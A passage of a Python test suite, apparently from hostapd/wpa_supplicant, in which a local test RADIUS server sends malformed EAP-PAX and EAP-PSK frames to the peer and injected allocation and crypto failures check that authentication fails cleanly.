              (1, "eap_eke_dhcomp;eap_eke_process_commit", None),
              (1, "os_get_random;eap_eke_process_commit", None),
              (1, "os_get_random;=eap_eke_process_commit", None),
              (1, "eap_eke_prot;eap_eke_process_commit", None),
              (1, "eap_eke_decrypt_prot;eap_eke_process_confirm", None),
              (1, "eap_eke_derive_ka;eap_eke_process_confirm", None),
              (1, "eap_eke_auth;eap_eke_process_confirm", None),
              (2, "eap_eke_auth;eap_eke_process_confirm", None),
              (1, "eap_eke_prot;eap_eke_process_confirm", None),
              (1, "eap_eke_derive_msk;eap_eke_process_confirm", None) ]
    for count, func, phase1 in tests:
        with fail_test(dev[0], count, func):
            eap_eke_test_fail(dev[0], phase1)
    # Phase 3: memory allocation failures (alloc_fail) in message
    # construction/processing paths; EAP is expected to fail cleanly.
    tests = [ (1, "=eap_eke_derive_ke_ki", None),
              (1, "=eap_eke_derive_ka", None),
              (1, "=eap_eke_derive_msk", None),
              (1, "eap_eke_build_msg;eap_eke_process_id", None),
              (1, "wpabuf_alloc;eap_eke_process_id", None),
              (1, "=eap_eke_process_id", None),
              (1, "wpabuf_alloc;=eap_eke_process_id", None),
              (1, "wpabuf_alloc;eap_eke_process_id", None),
              (1, "eap_eke_build_msg;eap_eke_process_commit", None),
              (1, "wpabuf_resize;eap_eke_process_commit", None),
              (1, "eap_eke_build_msg;eap_eke_process_confirm", None) ]
    for count, func, phase1 in tests:
        with alloc_fail(dev[0], count, func):
            eap_eke_test_fail(dev[0], phase1)
    # Phase 4: allocation failures in key-export getters; authentication
    # itself succeeds, so eap_eke_test_fail is told to accept success.
    tests = [ (1, "eap_eke_getKey", None),
              (1, "eap_eke_get_emsk", None),
              (1, "eap_eke_get_session_id", None) ]
    for count, func, phase1 in tests:
        with alloc_fail(dev[0], count, func):
            eap_eke_test_fail(dev[0], phase1, success=True)
# EAP-PAX protocol constants used by the crafted test frames below
# (presumably matching the EAP-PAX specification, RFC 4746 — values are
# taken as-is from the implementation under test).

# Op-codes identifying the PAX message within an exchange
EAP_PAX_OP_STD_1 = 0x01
EAP_PAX_OP_STD_2 = 0x02
EAP_PAX_OP_STD_3 = 0x03
EAP_PAX_OP_SEC_1 = 0x11
EAP_PAX_OP_SEC_2 = 0x12
EAP_PAX_OP_SEC_3 = 0x13
EAP_PAX_OP_SEC_4 = 0x14
EAP_PAX_OP_SEC_5 = 0x15
EAP_PAX_OP_ACK = 0x21

# Flags bitfield: More Fragments / Certificate Enabled / ADE Included
EAP_PAX_FLAGS_MF = 0x01
EAP_PAX_FLAGS_CE = 0x02
EAP_PAX_FLAGS_AI = 0x04

# MAC ID values (NOTE(review): the SHA-256 name is missing the "MAC_"
# infix used by the SHA-1 name; kept as-is since it is referenced below)
EAP_PAX_MAC_HMAC_SHA1_128 = 0x01
EAP_PAX_HMAC_SHA256_128 = 0x02

# Diffie-Hellman group IDs
EAP_PAX_DH_GROUP_NONE = 0x00
EAP_PAX_DH_GROUP_2048_MODP = 0x01
EAP_PAX_DH_GROUP_3072_MODP = 0x02
EAP_PAX_DH_GROUP_NIST_ECC_P_256 = 0x03

# Public key ID values
EAP_PAX_PUBLIC_KEY_NONE = 0x00
EAP_PAX_PUBLIC_KEY_RSAES_OAEP = 0x01
EAP_PAX_PUBLIC_KEY_RSA_PKCS1_V1_5 = 0x02
EAP_PAX_PUBLIC_KEY_EL_GAMAL_NIST_ECC = 0x03

# ADE (Authenticated Data Exchange) type values
EAP_PAX_ADE_VENDOR_SPECIFIC = 0x01
EAP_PAX_ADE_CLIENT_CHANNEL_BINDING = 0x02
EAP_PAX_ADE_SERVER_CHANNEL_BINDING = 0x03
def test_eap_proto_pax(dev, apdev):
    """EAP-PAX protocol tests

    Drives the EAP-PAX peer implementation through a sequence of crafted
    server messages (malformed headers, unsupported cipersuite IDs,
    incorrect/correct ICVs, mid-session parameter changes) via a local
    test RADIUS server, verifying the peer survives each case.
    """
    def pax_std_1(ctx):
        # Valid PAX_STD-1 request with a precomputed ICV; the identifier
        # is pinned to 10 so the hard-coded ICV bytes stay valid.
        logger.info("Test: STD-1")
        ctx['id'] = 10
        return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 5 + 2 + 32 + 16,
                           EAP_TYPE_PAX,
                           EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                           EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                           32, 0, 0, 0, 0, 0, 0, 0, 0,
                           0x16, 0xc9, 0x08, 0x9d, 0x98, 0xa5, 0x6e, 0x1f,
                           0xf0, 0xac, 0xcf, 0xc4, 0x66, 0xcd, 0x2d, 0xbf)
    def pax_handler(ctx, req):
        # Called once per received EAP response; ctx['num'] counts the
        # rounds so each connection attempt gets the next crafted frame.
        logger.info("pax_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PAX)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Minimum length payload")
            return struct.pack(">BBHB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 16,
                               EAP_TYPE_PAX,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported MAC ID")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, 255, EAP_PAX_DH_GROUP_NONE,
                               EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported DH Group ID")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               255, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported Public Key ID")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, 255,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: More fragments")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_MF,
                               EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid ICV")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid ICV in short frame")
            return struct.pack(">BBHBBBBBB3L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 12,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0)
        # The following cases carry precomputed, valid ICVs (hence the
        # pinned ctx['id'] = 10) so the payload errors are what is tested.
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - unsupported op_code")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               255, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0x90, 0x78, 0x97, 0x38, 0x29, 0x94, 0x32, 0xd4,
                               0x81, 0x27, 0xe0, 0xf6, 0x3b, 0x0d, 0xb2, 0xb2)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - CE flag in STD-1")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_CE,
                               EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0x9c, 0x98, 0xb4, 0x0b, 0x94, 0x90, 0xde, 0x88,
                               0xb7, 0x72, 0x63, 0x44, 0x1d, 0xe3, 0x7c, 0x5c)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - too short STD-1 payload")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0xda, 0xab, 0x2c, 0xe7, 0x84, 0x41, 0xb5, 0x5c,
                               0xee, 0xcf, 0x62, 0x03, 0xc5, 0x69, 0xcb, 0xf4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - incorrect A length in STD-1")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xc4, 0xb0, 0x81, 0xe4, 0x6c, 0x8c, 0x20, 0x23,
                               0x60, 0x46, 0x89, 0xea, 0x94, 0x60, 0xf3, 0x2a)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - extra data in STD-1")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBBH8LB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 1 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               1,
                               0x61, 0x49, 0x65, 0x37, 0x21, 0xe8, 0xd8, 0xbf,
                               0xf3, 0x02, 0x01, 0xe5, 0x42, 0x51, 0xd3, 0x34)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected STD-1")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xe5, 0x1d, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        # Each "changed during session" case is preceded by a valid STD-1
        # so the peer has accepted the initial ciphersuite parameters.
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: MAC ID changed during session")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_HMAC_SHA256_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xee, 0x00, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: DH Group ID changed during session")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_2048_MODP,
                               EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xee, 0x01, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Public Key ID changed during session")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE,
                               EAP_PAX_PUBLIC_KEY_RSAES_OAEP,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xee, 0x02, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected STD-3")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_3, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0x47, 0xbb, 0xc0, 0xf9, 0xb9, 0x69, 0xf5, 0xcb,
                               0x3a, 0xe8, 0xe7, 0xd6, 0x80, 0x28, 0xf2, 0x59)
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            # TODO: MAC calculation; for now, this gets dropped due to incorrect
            # ICV
            logger.info("Test: STD-3 with CE flag")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_3, EAP_PAX_FLAGS_CE,
                               EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0x8a, 0xc2, 0xf9, 0xf4, 0x8b, 0x75, 0x72, 0xa2,
                               0x4d, 0xd3, 0x1e, 0x54, 0x77, 0x04, 0x05, 0xe2)
        # Past the scripted cases: alternate between a minimal request and
        # EAP-Failure based on round parity to terminate the exchange.
        idx += 1
        if ctx['num'] & 0x1 == idx & 0x1:
            logger.info("Test: Default request")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PAX)
        else:
            logger.info("Test: Default EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
    srv = start_radius_server(pax_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # One connection attempt per scripted handler case
        for i in range(0, 18):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PAX", identity="user",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            logger.info("Waiting for EAP method to start")
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
        # Local validation cases: PAX requires a 16-octet password_hex key
        logger.info("Too short password")
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PAX", identity="user",
                       password_hex="0123456789abcdef0123456789abcd",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
        logger.info("No password")
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PAX", identity="user",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_pax_errors(dev, apdev):
    """EAP-PAX local error cases"""
    check_eap_capa(dev[0], "PAX")
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)
    # Phase 1: allocation failure inside eap_pax_init; method setup must
    # fail before any EAP exchange starts.
    for i in range(1, 3):
        with alloc_fail(dev[0], i, "eap_pax_init"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PAX", identity="pax.user@example.com",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Phase 2: allocation failures in response building and key export
    tests = [ "eap_msg_alloc;eap_pax_alloc_resp;eap_pax_process_std_1",
              "eap_msg_alloc;eap_pax_alloc_resp;eap_pax_process_std_3",
              "eap_pax_getKey",
              "eap_pax_get_emsk",
              "eap_pax_get_session_id" ]
    for func in tests:
        with alloc_fail(dev[0], 1, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PAX", identity="pax.user@example.com",
                           password_hex="0123456789abcdef0123456789abcdef",
                           erp="1", wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Phase 3: forced failures (fail_test) in RNG, key derivation, and
    # MAC computation paths; each entry is (count, function[;caller]).
    tests = [ (1, "os_get_random;eap_pax_process_std_1"),
              (1, "eap_pax_initial_key_derivation"),
              (1, "eap_pax_mac;eap_pax_process_std_3"),
              (2, "eap_pax_mac;eap_pax_process_std_3"),
              (1, "eap_pax_kdf;eap_pax_getKey"),
              (1, "eap_pax_kdf;eap_pax_get_emsk") ]
    for count, func in tests:
        with fail_test(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PAX", identity="pax.user@example.com",
                           password_hex="0123456789abcdef0123456789abcdef",
                           erp="1", wait_connect=False)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
def test_eap_proto_psk(dev, apdev):
    """EAP-PSK protocol tests

    Feeds the EAP-PSK peer a scripted sequence of crafted server
    messages (missing payload, bad T bit values, truncated third
    message, missing PCHANNEL, invalid MAC_S) through a local test
    RADIUS server, then exercises local validation of the PSK length.
    """
    def psk_handler(ctx, req):
        # Called once per received EAP response; ctx['num'] counts the
        # rounds so each connection attempt gets the next crafted frame.
        logger.info("psk_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PSK)
        idx += 1
        if ctx['num'] == idx:
            # T (top two bits of the flags octet) must be 0 in message 1
            logger.info("Test: Non-zero T in first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0xc0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short third message")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PSK)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            # Message 3 must carry T=0x80; T=0 here is invalid
            logger.info("Test: Incorrect T in third message")
            return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing PCHANNEL in third message")
            return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 16,
                               EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            # Fixed typo in log message: "Invalic" -> "Invalid"
            logger.info("Test: Invalid MAC_S in third message")
            return struct.pack(">BBHBB4L4L5LB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 16 + 21,
                               EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return None
    srv = start_radius_server(psk_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # One connection attempt per scripted handler case
        for i in range(0, 6):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PSK", identity="user",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
        # Local validation: EAP-PSK requires a 16-octet PSK
        logger.info("Test: Invalid PSK length")
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PSK", identity="user",
                       password_hex="0123456789abcdef0123456789abcd",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                               timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
def test_eap_proto_psk_errors(dev, apdev):
    """EAP-PSK local error cases"""
    check_eap_capa(dev[0], "PSK")
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)
    # Phase 1: allocation failure inside eap_psk_init
    for i in range(1, 3):
        with alloc_fail(dev[0], i, "eap_psk_init"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PSK", identity="psk.user@example.com",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Phase 2: forced failure in key setup during init
    for i in range(1, 4):
        with fail_test(dev[0], i, "eap_psk_key_setup;eap_psk_init"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PSK", identity="psk.user@example.com",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Phase 3: allocation failures in message processing and key export;
    # each entry is (count, function[;caller]).
    tests = [ (1, "=eap_psk_process_1"),
              (2, "=eap_psk_process_1"),
              (1, "eap_msg_alloc;eap_psk_process_1"),
              (1, "=eap_psk_process_3"),
              (2, "=eap_psk_process_3"),
              (1, "eap_msg_alloc;eap_psk_process_3"),
              (1, "eap_psk_getKey"),
              (1, "eap_psk_get_session_id"),
              (1, "eap_psk_get_emsk") ]
    for count, func in tests:
        with alloc_fail(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PSK", identity="psk.user@example.com",
                           password_hex="0123456789abcdef0123456789abcdef",
                           erp="1", wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL",
                              note="No allocation failure seen for %d:%s" % (count, func))
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Phase 4: forced failures (fail_test) in RNG, OMAC/EAX crypto, and
    # AES key derivation paths.
    tests = [ (1, "os_get_random;eap_psk_process_1"),
              (1, "omac1_aes_128;eap_psk_process_3"),
              (1, "aes_128_eax_decrypt;eap_psk_process_3"),
              (2, "aes_128_eax_decrypt;eap_psk_process_3"),
              (3, "aes_128_eax_decrypt;eap_psk_process_3"),
              (1, "aes_128_eax_encrypt;eap_psk_process_3"),
              (2, "aes_128_eax_encrypt;eap_psk_process_3"),
              (3, "aes_128_eax_encrypt;eap_psk_process_3"),
              (1, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
              (2, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
              (3, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
              (4, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
              (5, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
              (6, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
              (7, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
              (8, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
              (9, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
              (10, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
              (1, "aes_128_ctr_encrypt;aes_128_eax_decrypt;eap_psk_process_3"),
              (1, "aes_128_ctr_encrypt;aes_128_eax_encrypt;eap_psk_process_3") ]
    for count, func in tests:
        with fail_test(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PSK", identity="psk.user@example.com",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            wait_fail_trigger(dev[0], "GET_FAIL",
                              note="No failure seen for %d:%s" % (count, func))
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
